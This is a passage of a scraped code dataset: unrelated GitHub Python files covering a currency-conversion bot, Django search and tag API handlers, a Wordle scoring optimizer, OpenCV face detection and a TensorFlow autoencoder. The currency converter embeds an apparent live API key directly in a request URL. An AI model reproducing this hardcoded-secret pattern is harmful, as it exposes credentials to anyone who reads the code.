snakemake.output['outfile'])\n","repo_name":"UniboDIFABiophysics/WESPipeline","sub_path":"scripts/mutectPreAnnovar.py","file_name":"mutectPreAnnovar.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37351245872","text":"def Binarytodecimal(n):\n num=n;\n dvalue=0;\n\n base=1 \n temp=num;\n while(temp):\n last_digit=temp%10\n temp=int(temp/10)\n dvalue+=last_digit*base\n base*=2\n return dvalue\n\na=Binarytodecimal(101)\nprint(a)","repo_name":"AmitChapde/Practice","sub_path":"BinarytoDecimal.py","file_name":"BinarytoDecimal.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38669326935","text":"import requests\nimport json\nfrom config import keys\n\nclass APIException(Exception):\n pass\n\nclass Converter:\n @staticmethod\n def get_price(quote: str, base: str, amount: str):\n if quote == base:\n raise APIException(f\"Невозможно осуществить конвертацию валюты одного и то же наименования {base}.\")\n try:\n quote_ticker = keys[quote]\n except KeyError:\n raise APIException(f'Не удалось обработать валюту {quote}')\n try:\n base_ticker = keys[base]\n except KeyError:\n raise APIException(f\"Не удалось обработать валюту {base}\")\n try:\n amount = str(amount)\n except ValueError:\n raise APIException(f\"Не удалось обработать количество {amount}\")\n\n r = requests.get(f'https://v6.exchangerate-api.com/v6/af4c65dd57ce550e76041503/pair/{quote_ticker}/{base_ticker}')\n total_base = json.loads(r.content)[\"conversion_rate\"] * float(amount)\n return total_base","repo_name":"GefKarter/Report","sub_path":"Cash_Bot/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13885375130","text":"import re\n\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.query import QuerySet\nfrom django.http import HttpResponse\nfrom django.utils import simplejson as json\n\nfrom mongoengine import ValidationError #, Q\nfrom mongoengine.connection import _get_db as get_db\n\nfrom analytics.shortcuts import (increment_api_queries, increment_api_locations,\n increment_api_resources)\nfrom locations.models import Location\nfrom resources.models import Resource, Curation\nfrom resources.search import find_by_place_or_kwords, get_location\nincrement_api_resources\nclass JsonResponse(HttpResponse):\n \"\"\"from http://www.djangosnippets.org/snippets/1639/\"\"\"\n errors = {}\n __data = []\n callback = None\n\n def __set_data(self, data):\n if data == []:\n self.__data = []\n else:\n self.__data = (isinstance(data, QuerySet) or hasattr(data[0], '_meta'))\\\n and serializers.serialize('python', data) or data\n\n data = property(fset = __set_data)\n\n def __get_container(self):\n content = json.dumps(\n {\n \"data\": self.__data,\n \"errors\":self.errors,\n }, cls = DjangoJSONEncoder)\n if self.callback:\n return '%s (%s)' % (self.callback, content)\n else:\n return content\n\n def __set_container(self, val):\n pass\n\n _container = property(__get_container, __set_container)\n\n def __init__(self, *args, **kwargs):\n kwargs[\"mimetype\"] = \"application/javascript\"\n\n if \"data\" in kwargs:\n self.data = kwargs.pop(\"data\")\n\n if \"errors\" in kwargs:\n self.errors = kwargs.pop(\"errors\")\n\n if \"callback\" in kwargs:\n self.callback = kwargs.pop('callback')\n\n super(JsonResponse, self).__init__(*args, **kwargs)\n\ndef resource_by_id(request, id):\n \"\"\"docstring for item_resource\"\"\"\n callback = request.REQUEST.get('callback')\n\n errors = []\n try:\n item = Resource.objects.get(id=id)\n except ValidationError:\n result_code = 20\n errors.append('Not a valid resource ID')\n except Resource.DoesNotExist:\n result_code = 20\n errors.append('No resource found with that ID')\n # print item.title\n\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. '.join(errors)})\n\n increment_api_resources(id)\n\n data=[{\n 'id': unicode(item.id),\n 'title': item.title,\n 'description': item.description,\n 'resourcetype': item.resource_type or '',\n 'uri': item.uri,\n 'locations': ['%s, %s' % (loc.lat_lon[0], loc.lat_lon[1]) for loc in item.locations],\n 'locationnames': [loc.place_name for loc in item.locations],\n 'event_start': (item.calendar_event.start or '') if item.calendar_event else '',\n 'event_end': (item.calendar_event.end or '') if item.calendar_event else '',\n 'tags': item.tags,\n 'lastmodified': item.item_metadata.last_modified,\n }]\n return JsonResponse(data=data, callback=callback)\n\ndef _check_int(i):\n try:\n int(i)\n return True\n except ValueError:\n return None\n\ndef _check_api_bool(value, default=False):\n \"\"\" returns a boolean value for value\n False if 0, True if any other int\n returns default if value is None or not an int\n \"\"\"\n try: \n result = int(value)\n except (ValueError, TypeError):\n result = default\n return bool(result)\n\ndef _loc_to_str(loc):\n if loc:\n return [\"%.16f, %.16f\" % (loc[0], loc[1])]\n else:\n return []\n\ndef resource_search(request):\n def _resource_result(r):\n result = {\n 'id': r['res_id'],\n 'title': r['title'],\n 'description': r.get('short_description', ''),\n # 'resource_type': r[''] resource_type or '',\n 'uri': r.get('uri', ''),\n 'locations': r.get('pt_location', []),\n 'locationnames': r.get('loc_labels', []),\n # u'loc_labels': [u'EH17 8QG, Liberton/Gilmerton, of Edinburgh'], u'pt_location': [u'55.9062925785, -3.13446285433']\n 'tags': r.get('keywords', ''),\n 'accounts': r.get('accounts', ''),\n 'score': r['score']\n # 'last_modified': r[''] .item_metadata.last_modified,\n }\n if r.get('event_start'):\n result['event_start'] = r.get('event_start')\n if r.get('event_end'):\n result['event_end'] = r.get('event_end')\n return result\n\n location = request.REQUEST.get('location', '')\n accounts = request.REQUEST.get('accounts', '')\n collections = request.REQUEST.get('collections', '')\n if collections:\n accounts = ''\n event = request.REQUEST.get('event', None)\n query = request.REQUEST.get('query')\n max = request.REQUEST.get('max', unicode(settings.SOLR_ROWS))\n start = request.REQUEST.get('start', 0)\n output = request.REQUEST.get('output', 'json')\n boost_location = request.REQUEST.get('boostlocation', (settings.SOLR_LOC_BOOST_DEFAULT))\n callback = request.REQUEST.get('callback')\n\n increment_api_queries(query)\n increment_api_locations(location)\n\n result_code = 200\n\n errors = []\n # if not query:\n # result_code = 10\n # errors.append('Param \\'query\\' must be valid search query')\n if not _check_int(max) or int(max) > settings.SOLR_ROWS:\n result_code = 10\n errors.append('Param \\'max\\' must be positive integer maximum value of %s. You sent %s' % (settings.SOLR_ROWS, max))\n if not _check_int(start) or int(start) < 0:\n result_code = 10\n errors.append('Param \\'start\\' must be positive integer. You sent %s' % start)\n if not _check_int(boost_location) or int(boost_location) > int(settings.SOLR_LOC_BOOST_MAX):\n result_code = 10\n errors.append('Param \\'boostlocation\\' must be an integer number between 0 and %s. You sent %s' % (int(settings.SOLR_LOC_BOOST_MAX), boost_location))\n if event and event != '*':\n result_code = 10\n errors.append('Param \\'event\\' must be * if present.')\n if not errors:\n loc, resources = find_by_place_or_kwords(\n location, \n query, \n boost_location, \n start=start, \n max=int(max), \n accounts=accounts.split(), \n collections=collections.split(), \n event=event)\n if location and not loc:\n result_code = 10\n errors.append('Location \\'%s\\' not found.' % location)\n\n if errors:\n return JsonResponse(errors=[{ 'code': result_code, 'message': '. '.join(errors)}], callback=callback)\n else:\n results = [_resource_result(r) for r in resources]\n data = [ { 'query': query, 'max': max, 'start': start, 'numfound': resources.hits, 'output': output,\n 'location': _loc_to_str(loc['lat_lon']) if loc else '', 'event': event, 'boostlocation': boost_location,\n 'accounts': accounts, 'collections': collections,\n 'results': results } ]\n return JsonResponse(data=data, callback=callback)\n\n\ndef publish_data(request):\n \"\"\"docstring for publish_data\"\"\"\n def _resource_result(r):\n return {\n 'id': unicode(r.id),\n 'title': r.title,\n 'description': r.description,\n 'resource_type': r.resource_type,\n 'uri': 'http://aliss.org/depot/resource/%s/' % unicode(r.id),\n 'source_uri': r.uri,\n 'locations': [{\n 'postcode': l.postcode, \n 'place_name': l.place_name, \n 'loc_type': l.loc_type, \n 'lat_lon': l.lat_lon,\n 'district': l.district,\n 'country_code': l.country_code\n } for l in r.locations],\n # 'event_start': r.event_start,\n 'tags': r.all_tags,\n 'curations': ['http://aliss.org/depot/curation/%s/' % unicode(c.id) for c in r.curations],\n # 'accounts': r.get('accounts', ''),\n # 'score': r['score']\n # # 'last_modified': r[''] .item_metadata.last_modified,\n }\n\n max = request.REQUEST.get('max', unicode(settings.SOLR_ROWS))\n start = request.REQUEST.get('start', 0)\n callback = request.REQUEST.get('callback')\n\n result_code = 200\n\n errors = []\n if not _check_int(max) or int(max) > settings.SOLR_ROWS:\n result_code = 10\n errors.append('Param \\'max\\' must be positive integer maximum value of %s. You sent %s' % (settings.SOLR_ROWS, max))\n if not _check_int(start) or int(start) < 0:\n result_code = 10\n errors.append('Param \\'start\\' must be positive integer. You sent %s' % start)\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. '.join(errors)}, data=[], callback=callback)\n # return JsonResponse(data=[], callback=callback)\n else:\n results = [_resource_result(r) for r in Resource.objects[int(start):int(start)+int(max)]]\n data = [ { 'max': max, 'start': start, 'results': results }]\n return JsonResponse(data=data, callback=callback)\n\ndef tags(request):\n \"\"\"\n API call with optional params for callback and match\n callback: for jsonp callback function name\n match: if present, results will be alpha sorted list of all tags used starting with match\n (case insensitive, so \"men\" might return \"mental health, Mental Health, mentoring\")\n if match is not passed, all tags in use will be returned.\n returns alpha sorted list of strings\n \"\"\"\n errors = []\n data = None\n result_code = 200\n\n # /api/tags/?callback=jsonp1268179474512&match=exe\n\n match = request.REQUEST.get('match')\n callback = request.REQUEST.get('callback')\n\n if not match is None:\n if len(match) > 2:\n results = [t for t in\n Curation.objects.ensure_index(\"tags\").filter(tags__istartswith=match).distinct(\"tags\") \\\n if t.lower().startswith(match.lower())]\n else:\n result_code = 10\n errors.append('Param \\'match\\' must be greater than 2 characters. You sent \\'%s\\'' % match)\n else:\n results = Curation.objects.ensure_index(\"tags\").distinct(\"tags\")\n\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. '.join(errors)}, data=[], callback=callback)\n\n return JsonResponse(data=sorted(results), callback=callback)\n\ndef tagsforwordle(request):\n \"\"\"\n returns dump of all tags for use in wordle\n todo: wordle accepts ~ to join words\n \"\"\"\n result = []\n for res in Resource.objects:\n result.extend([tag.replace(' ', '~') for tag in res.tags])\n\n return HttpResponse(' '.join(result))\n\ndef locations(request):\n def _location_context(loc):\n return {\n 'id': str(loc['_id']),\n 'place_name': loc['place_name'],\n 'postcode': loc.get('postcode', ''),\n 'district': loc.get('district', '')}\n errors = []\n data = []\n response_code = 200\n\n match = request.REQUEST.get('match')\n callback = request.REQUEST.get('callback')\n # postcodes True unless param exists and is 0\n postcodes = _check_api_bool(request.REQUEST.get('postcodes'), True)\n\n if match and len(match) > 2:\n data = [_location_context(l)\n for l in get_location(match, just_one=False, starts_with=True, postcodes=postcodes)]\n else:\n response_code = 10\n errors.append('Param \\'match\\' must be greater than 2 characters. You sent \\'%s\\'' % match)\n return JsonResponse(\n errors=errors and {'code': response_code, 'message': '. '.join(errors)} or {},\n data=data,\n callback=callback,\n )\n\ndef savedsearchesbyIP(request):\n\n from accounts.models import AccountIPRange, SavedSearch, dqn_to_int\n\n callback = request.REQUEST.get('callback')\n ip = request.META['REMOTE_ADDR']\n\n int_ip = dqn_to_int(ip)\n\n data = []\n errors = {}\n\n try:\n account = AccountIPRange.objects.get(ip_min__lt=int_ip, ip_max__gt=int_ip)\n searches = SavedSearch.objects.get(owner=account.owner)\n data = searches.terms\n except AccountIPRange.DoesNotExist:\n errors = {\n 'code': 404,\n 'message': 'No account was found for the given IP range.'\n }\n except SavedSearch.DoesNotExist:\n errors = {\n 'code': 404,\n 'message': 'No saved searches were found for the account %s' % account.owner\n }\n\n return JsonResponse(\n errors=errors,\n data=data,\n callback=callback,\n )\n","repo_name":"snowcloud/engineclub","sub_path":"engineclub/apps/engine/resources/api_handlers.py","file_name":"api_handlers.py","file_ext":"py","file_size_in_byte":12742,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"42308689914","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom petra import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('products/', views.ProductList.as_view(), name=\"product-list\"),\n path('products//',views.ProductDetail.as_view(), name=\"product-detail\"),\n path('signup/', views.Register.as_view(), name=\"signup\"),\n path('login/', TokenObtainPairView.as_view(), name=\"login\"),\n\n path('create/', views.Create.as_view(), name=\"create\"),\n path('update//', views.Update.as_view(), name='update'),\n path('delete//', views.Delete.as_view(), name='delete'),\n path('cart//', views.CartDetails.as_view(), name='cart-detail'),\n path('update/', views.CartUpdate.as_view(), name='cart-update')\n\n]\n\nurlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","repo_name":"ahmedalsalman/PetraShop-DRF","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19798385143","text":"# Time Complexity: O(n1*n2)\n# Memory Complexity: O(n1+n2)\n# Where n1, n2 are len(num1), len(num2)\n\n\nclass Solution(object):\n def multiply(self, num1: str, num2: str) -> str:\n print(num1, num2)\n n1, n2 = len(num1), len(num2)\n result = [0] * (n1 + n2)\n num1 = [int(num1[i]) for i in range(n1)][::-1]\n num2 = [int(num2[i]) for i in range(n2)][::-1]\n\n for i in range(len(num1)):\n for j in range(len(num2)):\n result[i + j] += num1[i] * num2[j]\n result[i + j + 1] += result[i + j] // 10\n result[i + j] %= 10\n\n result = \"\".join([str(e) for e in result[::-1]]).lstrip(\"0\")\n return result if result != \"\" else \"0\"\n\n\n# print(Solution().multiply(\"123\", \"456\"))\n","repo_name":"Jakub-Domogala/LeetCode","sub_path":"2.medium/0043. Multiply Strings.py","file_name":"0043. Multiply Strings.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35742138881","text":"find_top = 13000\nmax_repeat_letters = 5\ntotal_value_dict = {}\npos1_value_dict = {}\npos2_value_dict = {}\npos3_value_dict = {}\npos4_value_dict = {}\npos5_value_dict = {}\ninput_file = \"wordle_best_\" + str(find_top) + \"_additions_recursive.txt\"\noutput_file = \"wordle_best_\" + str(find_top) + \"_additions_recursive.txt\"\ninput_guesses = \"wordle_guesses.txt\"\ntotal_freq_data = \"total_letter_frequency.txt\"\nposition1_data = \"position1_letter_frequency.txt\"\nposition2_data = \"position2_letter_frequency.txt\"\nposition3_data = \"position3_letter_frequency.txt\"\nposition4_data = \"position4_letter_frequency.txt\"\nposition5_data = \"position5_letter_frequency.txt\"\n\n\n# takes a string in the form of word1,word2,...,score, and returns the score as an int\ndef get_score(entry):\n entry_split = entry.split(\",\")\n return int(entry_split[-1].rstrip())\n\n\n# insert a string in the form of text,score into list in the appropriate spot\n# return the new lowest score in the list\ndef insert_in_order(list, text, score):\n # construct the string to insert\n inserted_text = text + \",\" + str(score) + \"\\n\"\n\n # iterate through list\n for index in range(len(list)):\n if get_score(list[index]) < score:\n list.insert(index, inserted_text)\n return get_score(list[-1])\n\n # If we get here it means the provided score is lower than every score in the list, so we should append\n list.append(inserted_text)\n return score\n\n\n# returns true if letter is in any of the words in list group, otherwise returns false\n# group is an element of group_list\ndef check_letter_in_group(group, letter):\n for k in range(len(group) - 1):\n if letter in group[k]:\n return True\n return False\n\n\n# returns true if letter is in position in any of the words in list group, otherwise returns false\n# group is an element of group_list\ndef check_letter_in_position_in_group(group, letter, position):\n for k in range(len(group) - 1):\n if letter == group[k][position]:\n return True\n return False\n\n\n# returns the value of letter in position\ndef get_positional_value(letter, position):\n if position == 0:\n return pos1_value_dict[letter]\n elif position == 1:\n return pos2_value_dict[letter]\n elif position == 2:\n return pos3_value_dict[letter]\n elif position == 3:\n return pos4_value_dict[letter]\n elif position == 4:\n return pos5_value_dict[letter]\n return 0\n\n\n# takes two lists of words and checks if they contain the same words\ndef check_if_duplicate(line_split1, line_split2):\n for word in line_split1:\n if word not in line_split2:\n return False\n return True\n\n\n# takes a string and returns the number of unique alphabetical letters in it\n# assumes input strings are in all upper or all lower case\ndef count_letters(line):\n count = 0\n for letter_index in range(len(line)):\n if line[letter_index].isalpha() and line[letter_index] not in line[:letter_index]:\n count = count + 1\n return count\n\n\n# given a list of groups of words and their scores, finds the find_top best words to add to each set to maximize it's\n# score\nif __name__ == '__main__':\n\n answered = False\n answer = 0\n\n while not answered:\n print(\"Press 1 for regular (easier to read) output, or press 2 for recursive output (In a format that allows \"\n \"this code to be ran on it again)\")\n answer = int(input())\n if answer == 1 or answer == 2:\n answered = True\n\n word_list = []\n group_list = []\n\n # stores the exact string from the file for later use\n original_group_list = []\n\n # stores the number of unique letters in the word combination at the respective index in group_list\n letter_count = []\n\n # fill the group list using the groups and scores from the file, as well as the unique letters list\n f = open(input_file, 'r')\n lines = f.readlines()\n\n # use the first line to get how many letters are in each line\n input_letters = 0\n for letter in lines[0]:\n if letter.isalpha():\n input_letters += 1\n\n print(\"Counting unique letters....\")\n for i in range(len(lines)):\n print(\"Counting \" + str(i) + \"/\" + str(len(lines)))\n original_group_list.append(lines[i])\n line_strip = lines[i].rstrip()\n letter_count.append(count_letters(line_strip))\n line_split = line_strip.split(',')\n group_list.append(line_split)\n\n f.close()\n\n # fill the word list\n f = open(input_guesses, 'r')\n lines = f.readlines()\n\n word_letters = 0\n # use the first word to get how many letters are in each word\n for letter in lines[0]:\n if letter.isalpha():\n word_letters += 1\n\n for line in lines:\n word_list.append(line.rstrip())\n\n f.close()\n\n # fill the total count dictionary\n f = open(total_freq_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n total_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 1 count dictionary\n f = open(position1_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos1_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 2 count dictionary\n f = open(position2_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos2_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 3 count dictionary\n f = open(position3_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos3_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 4 count dictionary\n f = open(position4_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos4_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 5 count dictionary\n f = open(position5_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos5_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n additions_list = []\n # iterate through every group\n for i in range(len(group_list)):\n\n print(\"Evaluating group: \" + original_group_list[i] + \" \" + str(i) + \"/\" + str(len(group_list)))\n # initialize the current score of the group as the minimum score\n group_score = int(group_list[i][-1])\n min_score = int(group_list[i][-1])\n top_additions = []\n\n # iterate through all words to find the best additions\n for word in word_list:\n\n score = group_score\n new_unique_letters = 0\n\n # iterate through all letters in word to get the score\n for j in range(len(word)):\n\n # if too many duplicate letters are found stop examining this word\n if (input_letters + j) - (letter_count[i] + new_unique_letters) > max_repeat_letters:\n break\n\n # check if this letter is in any of the words in the group\n if not check_letter_in_group(group_list[i], word[j]):\n score += get_positional_value(word[j], j)\n if word[j] not in word[0:j]:\n score += total_value_dict[word[j]]\n new_unique_letters += 1\n\n # check if this letter is in the same position in any of the words in group\n elif not check_letter_in_position_in_group(group_list[i], word[j], j):\n score += get_positional_value(word[j], j)\n\n # do not add this word if it would cause the combination to repeat too many letters\n if (input_letters + word_letters) - (letter_count[i] + new_unique_letters) <= max_repeat_letters:\n\n # if the list still has room add this word to the list\n if len(top_additions) < find_top:\n min_score = insert_in_order(top_additions, word, score)\n\n # if score is greater than min score, remove the lowest scoring word and\n # add this word to top_additions in the appropriate spot\n elif score >= min_score:\n top_additions.pop(-1)\n min_score = insert_in_order(top_additions, word, score)\n\n # add the list of the best additions to additions_list, at the same index as the group\n additions_list.insert(i, top_additions)\n\n # write the file output\n\n if answer == 1:\n f = open(\"wordle_best_\" + str(find_top) + \"_additions.txt\", 'w')\n # iterate and write all the input groups\n for i in range(len(original_group_list)):\n f.write(original_group_list[i])\n\n # iterate and write the list of top additions\n for addition in additions_list[i]:\n f.write(\" \" + addition)\n f.close()\n\n # write the file output in the same format as an input file\n # this also sorts the output by score\n elif answer == 2:\n print(\"Creating output...\")\n output_lines = []\n for i in range(len(group_list)):\n start_line = \"\"\n for j in range(len(group_list[i]) - 1):\n start_line = start_line + group_list[i][j] + \",\"\n for addition in additions_list[i]:\n output_lines.append(start_line + addition)\n print(\"Sorting...\")\n output_lines.sort(key=get_score, reverse=True)\n\n output_lines = output_lines[:1000000]\n # eliminate combinations that have the same words as other combinations\n print(\"Eliminating duplicates...\")\n i = 0\n while i < len(output_lines):\n\n print(\"Checking \" + str(i) + \"/\" + str(len(output_lines)))\n\n line_split = output_lines[i].rstrip().split(',')\n\n j = i + 1\n while j < len(output_lines):\n\n line2_split = output_lines[j].rstrip().split(',')\n # if scores are not the same don't check any further into the list\n if line2_split[-1] != line_split[-1]:\n break\n # if duplicate found remove it\n elif check_if_duplicate(line_split[:-1], line2_split[:-1]):\n output_lines.pop(j)\n j = j - 1\n\n j = j + 1\n\n i = i + 1\n\n print(\"Writing...\")\n f = open(output_file, 'w')\n f.writelines(output_lines)\n f.close()\n","repo_name":"nunesale/wordleoptimization","sub_path":"wordle_best_addition.py","file_name":"wordle_best_addition.py","file_ext":"py","file_size_in_byte":10843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34268252952","text":"import json\nimport cv2\nimport numpy as np\n\nframe = 0\ncascPath = 'processing/haarcascade_frontalface_alt2.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ndef process(data):\n\tnparr = np.frombuffer(data, np.uint8)\n\timg_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\tgray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n\n\tfaces = faceCascade.detectMultiScale(\n\t\tgray,\n\t\tscaleFactor=1.1,\n\t\tminNeighbors=10,\n\t\tminSize=(50, 50),\n\t\tflags=cv2.cv.CV_HAAR_SCALE_IMAGE\n\t)\n\tfor (x, y, w, h) in faces:\n\t\tcv2.rectangle(img_np, (x, y), (x+w, y+h), (0, 200, 100), 10)\n\t\n\tparam = [int(cv2.IMWRITE_PXM_BINARY),1]\n\tret, buf = cv2.imencode(\".ppm\", img_np, param)\n\tresimg = buf.tobytes()\n\treturn bytearray(resimg)","repo_name":"farisais/online-videostream-processing","sub_path":"processing/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"22976544865","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\nimport librosa\nimport scipy as sci\nimport soundfile as sf\nfrom time import time\n\n\ndef do_rtpghi_gaussian_window(mag, len_window, hop_length_):\n threshold = 1e-3\n pie = np.pi\n relative_height = 0.01\n width_ = (len_window / 2) / np.sqrt(-2 * np.log(relative_height))\n gaussian_window = sci.signal.get_window(('gaussian', width_), len_window)\n mag = np.clip(mag, threshold, None)\n log_mag = np.log(mag)\n qwe = np.shape(log_mag)\n recon_phase_der = np.zeros(qwe)\n # np.random.uniform(low=0,high=2*pie,size=qwe)\n recon_phase_output = np.zeros(qwe)\n M_freqs = qwe[0]\n N_frames = qwe[1]\n freq_time_ratio = -1 * (pie / 4) * \\\n (np.power(len_window, 2) / np.log(relative_height))\n scale_constant_6 = (hop_length_ * M_freqs) / (-2 * freq_time_ratio)\n\n # This is Equation 6 from the paper, which requires no look-ahead frames\n for ii in range(1, M_freqs - 1):\n recon_phase_der[ii,\n :] = scale_constant_6 * (log_mag[ii + 1,\n :] - log_mag[ii - 1,\n :]) + (pie * hop_length_ * ii / (M_freqs))\n for jj in range(1, N_frames - 1):\n bins_to_randomize = mag[:, jj] == threshold\n recon_phase_output[:, jj] = recon_phase_output[:, jj - 1] + \\\n 0.5 * (recon_phase_der[:, jj - 1] + recon_phase_der[:, jj])\n #recon_phase_output[bins_to_randomize,jj] = np.random.uniform(low=0,high=2*pie,size=np.shape(log_mag[mag[:,jj]==threshold,jj]))\n E = mag * np.exp(1j * recon_phase_output)\n return librosa.istft(E, hop_length=hop_length_)\n\n# Topology AutoEncoder:\n# Generating weights for the fully connected layers fc- refers to the -th\n# fully connected layer's neuron width\n\n\nclass Topology:\n def __init__(self, input_size):\n # Calculated Below\n self.fc = np.zeros((3)).astype(int)\n self.b = {}\n self.W_fc = {}\n self.output_size = 2049\n self.input_size = input_size\n\n # Constant Values belonging to topology:\n self.chkpt_name = 'checkpoints'\n self.min_HL = 16\n self.epochs = 300 # Number of epochs the ANN is trained for - 300 should be sufficient\n # ADAM learning rate - 1e-3 was found to produce robust ANNs\n self.learning_rate_adam = 1e-3\n self.l2_lamduh = 1e-16 # Lamda value for L1 Regularization\n self.batch_size = 200 # Typical batch size for ADAM useage\n # self.fc = [256,self.min_HL,256]\n self.fc = [256, 64, self.min_HL, 64, 256]\n\n # for i in range(3):\n # \tself.b[i] =self.getBiasVariable(self.fc[i],'b_' + str(i))\n # self.b[3] = self.getBiasVariable(self.output_size,'b_3')\n for i in range(5):\n self.b[i] = self.getBiasVariable(self.fc[i], 'b_' + str(i))\n self.b[5] = self.getBiasVariable(self.output_size, 'b_5')\n\n # Making weight variables\n # self.W_fc[0] = self.getWeightVariable([self.input_size, self.fc[0]],'W_fc1')\n # for i in range(1,3):\n # \tself.W_fc[i] = self.getWeightVariable([self.fc[i - 1],self.fc[i]],'W_fc' + str(i + 1))\n # self.W_fc[3] = self.getWeightVariable([self.fc[2], self.output_size],'W_fc4')\n\n self.W_fc[0] = self.getWeightVariable(\n [self.input_size, self.fc[0]], 'W_fc1')\n for i in range(1, 5):\n self.W_fc[i] = self.getWeightVariable(\n [self.fc[i - 1], self.fc[i]], 'W_fc' + str(i + 1))\n self.W_fc[5] = self.getWeightVariable(\n [self.fc[4], self.output_size], 'W_fc6')\n\n def getBiasVariable(self, shape_, name_):\n # Initialized with a truncated normal random variable\n initial = tf.truncated_normal([shape_], name=name_, stddev=0.15)\n return tf.Variable(initial)\n\n # Creates weight variables for the ANN and groups them in a collection for\n # use in L2 regularization\n def getWeightVariable(self, shape_, name_):\n # Initialized with a truncated normal random variable\n initial = tf.truncated_normal(shape_, name=name_, stddev=0.15)\n # Adding to L2 collection, summing squares\n tf.add_to_collection('l2', tf.reduce_sum(tf.pow(initial, 2)))\n return tf.Variable(initial)\n\n\nclass OperationMode:\n def __init__(\n self,\n train=False,\n new_init=False,\n validation=False,\n control=False,\n bias=False):\n self.train = train\n self.new_init = new_init\n self.validation = validation\n self.control = control\n self.bias = bias\n\n\nclass ANNeSynth:\n def __init__(self, operationMode, corpus, loss_choice='sc'):\n self._operationMode = operationMode\n self._corpus = corpus\n self._loss_choice = loss_choice\n self._sess = tf.Session()\n\n # Load the stft so we have an input_size (from the topology)\n self.loadDataSet()\n\n # Generating placeholders for the input and label data\n self.x_ = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.input_size])\n self.y_ = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.output_size])\n self.controller = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.min_HL])\n ##\n self.makeTensorFlowLayers()\n\n def loadDataSet(self):\n # Loading 95,443 Magnitude STFT frames saved as .npy (Loading in data)\n filename = self._corpus # Static Data used for training net\n data_path = os.path.join(os.getcwd(), filename)\n self.frames = np.load(data_path)\n self.frames = np.asarray(self.frames)\n self.validate = self.frames[42500:, :]\n self.topology = Topology(np.shape(self.frames)[1])\n\n def recurseThroughLayer(self, layer, i, desired_stop):\n Product = tf.matmul(layer, self.topology.W_fc[i])\n\n if(self._operationMode.bias):\n new_layer = tf.nn.relu(tf.add(Product, self.topology.b[i]))\n else:\n new_layer = tf.nn.relu(tf.add(Product, 0))\n\n if(i == desired_stop):\n return new_layer\n else:\n return self.recurseThroughLayer(new_layer, i + 1, desired_stop)\n\n def makeTensorFlowLayers(self):\n # Making the tensorflow layers from bias and weight variables\n # initialLayer = tf.nn.relu(tf.add(tf.matmul(self.x_, self.topology.W_fc[0]),0))\n # initialLayer2 = tf.nn.relu(tf.add(tf.matmul(self.controller, self.topology.W_fc[2]),0))\n # self.modulators = tf.placeholder(tf.float32, shape=[None, self.topology.fc[1]])\n # self.outputLayer = self.recurseThroughLayer(initialLayer,1,3)\n # self.outputLayer2 = self.recurseThroughLayer(initialLayer2,3,3)\n\n initialLayer = tf.nn.relu(\n tf.add(\n tf.matmul(\n self.x_,\n self.topology.W_fc[0]),\n 0))\n initialLayer2 = tf.nn.relu(\n tf.add(\n tf.matmul(\n self.controller,\n self.topology.W_fc[3]),\n 0))\n self.modulators = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.fc[2]])\n self.outputLayer = self.recurseThroughLayer(initialLayer, 1, 5)\n self.outputLayer2 = self.recurseThroughLayer(initialLayer2, 2, 5)\n\n def trainNeuralNetwork(self):\n # 